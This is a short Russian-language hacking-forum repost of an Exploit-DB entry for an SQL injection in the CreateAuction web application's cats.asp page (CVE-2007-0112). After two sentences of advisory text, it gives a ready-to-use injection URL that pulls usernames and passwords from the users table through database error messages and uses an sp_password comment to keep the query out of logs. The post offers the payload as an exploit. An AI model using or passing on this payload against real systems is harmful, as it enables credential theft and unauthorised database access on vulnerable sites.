Exploit CreateAuction - 'Cats.asp' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29401
Проверка EDB
  1. Пройдено
Автор
IBNUSINA
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2007-0112
Дата публикации
2007-01-08
CreateAuction - 'Cats.asp' SQL Injection
Код:
source: https://www.securityfocus.com/bid/21929/info

Createauction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

http://www.example.com/[path]/cats.asp?catid=1%20%20and%201=convert(int,(select%20top%201%20username%2b'/'%2bpassword%20from%20users))--sp_password
 
Источник
www.exploit-db.com

Похожие темы